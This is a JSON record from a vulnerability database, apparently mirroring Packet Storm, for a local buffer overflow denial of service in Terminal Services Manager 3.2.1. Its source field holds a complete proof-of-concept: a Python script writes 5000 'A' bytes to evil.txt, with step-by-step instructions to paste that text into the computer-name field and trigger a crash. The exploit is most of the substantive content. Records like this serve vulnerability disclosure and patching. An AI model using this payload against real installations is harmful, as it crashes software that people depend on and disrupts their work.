{"id": "PACKETSTORM:153041", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Terminal Services Manager 3.2.1 Denial Of Service", "description": "", "published": "2019-05-23T00:00:00", "modified": "2019-05-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/153041/Terminal-Services-Manager-3.2.1-Denial-Of-Service.html", "reporter": "Alejandra Sanchez", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2019-05-24T12:45:04", "viewCount": 55, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1678918916, "score": 1678917189, "epss": 1678939848}, "_internal": {"score_hash": "da8cb061411c357442a86ca75335619a"}, "sourceHref": "https://packetstormsecurity.com/files/download/153041/tsm321-dos.txt", "sourceData": "`# -*- coding: utf-8 -*- \n# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service \n# Date: 22/05/2019 \n# Author: Alejandra S\u00e1nchez \n# Vendor Homepage: https://lizardsystems.com \n# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe \n# Version: 3.2.1 (Build 247) \n# Tested on: Windows 10 \n \n# Steps to produce the crash: \n# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt' \n# 2.- Open Terminal Services Manager \n# 3.- Click 'Add computer' \n# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK' \n# 5.- In the 'List' tab select the computer created. \n# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash! \n \nbuffer = \"\\x41\" * 5000 \n \nf = open (\"evil.txt\", \"w\") \nf.write(buffer) \nf.close() \n`\n"}
{}